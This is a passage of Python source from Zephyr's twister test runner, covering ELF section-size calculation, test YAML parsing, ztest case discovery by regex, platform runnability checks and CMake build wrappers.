"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
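            # For illustration (made-up numbers), a typical "objdump -h" line
            # looks like (columns: Idx Name Size VMA LMA File-off Algn):
            #   1 text 00001a2c 00000000 00000000 00000074 2**2
            # so words[2] is the size, words[3] the VMA (virt_addr) and
            # words[4] the LMA (load_addr).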
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
            raise ConfigurationError(
                self.filename, "unknown type '%s'" % typestr)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
            for this test. Each key in this dictionary is a key that may be
            specified; if the .yaml file contains a key that isn't listed
            here, an error is generated. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
                    whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.timeout_multiplier = 1.0
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.timeout_multiplier = testing.get("timeout_multiplier", 1.0)
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestCase.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = []):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
self.ztest_suite_names = ztest_suite_names
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
        define one test, this can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
            # do not match until end-of-line, otherwise we won't allow
            # the testcase regex below to catch the ones that are declared in the
            # same line--as we only search starting at the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
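        # For example, a test that calls ztest_register_test_suite() and also
        # defines its own test_main(void) must call
        # ztest_run_registered_test_suites(); scan_path() below raises a
        # TwisterRuntimeError otherwise.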
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
                    # Can't find ztest_test_suite(); this is probably just a
                    # client that includes ztest.h without declaring its own suite.
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
Find regular ztest testcases like "ztest_unit_test" or similar. Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
        Get the search area boundary based on where the "ztest_test_suite(...)",
        "ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
        calls occur.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not suite_run_match and not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
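    # Illustration: for source such as
    #   ztest_test_suite(my_suite, ztest_unit_test(test_a));
    #   ztest_run_test_suite(my_suite);
    # the returned boundary starts right after "ztest_test_suite(my_suite," and
    # ends where "ztest_run_test_suite(" begins, so only the suite body is scanned.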
def _find_new_ztest_testcases(self, search_area):
"""
Find regular ztest testcases like "ZTEST" or "ZTEST_F". Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
        Parse the search area and try to find testcases matching the
        testcase_regex argument. Return the testcase names and any warnings found.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
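    # Illustration: scanning a buffer that contains (each on its own line)
    #   ztest_unit_test(test_foo),
    #   ztest_user_unit_test(test_bar)
    # with the regular testcase regex yields (["foo", "bar"], None); the
    # leading "test_" prefix is stripped from each discovered name.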
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
for sub in subcases:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not subcases:
self.cases.append(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
        Try to find the src directory containing the test source code. Sometimes,
        for optimization reasons, it is placed in the parent directory.
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
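    # For illustration, the run id is the hex MD5 digest of the instance name
    # concatenated with 64 random bits rendered as decimal text, so it is
    # unique per instance and differs on every twister invocation.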
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
        # On Windows we currently only support building; running is still
        # work in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
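    # Illustrative result (hypothetical values): with extra_configs of
    # ["CONFIG_FOO=y"] and coverage enabled for this platform, the generated
    # twister/testcase_extra.conf contains:
    #   CONFIG_FOO=y
    #   CONFIG_COVERAGE=y
    #   CONFIG_COVERAGE_DUMP=y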
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
self.instance.fill_results_by_status()
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
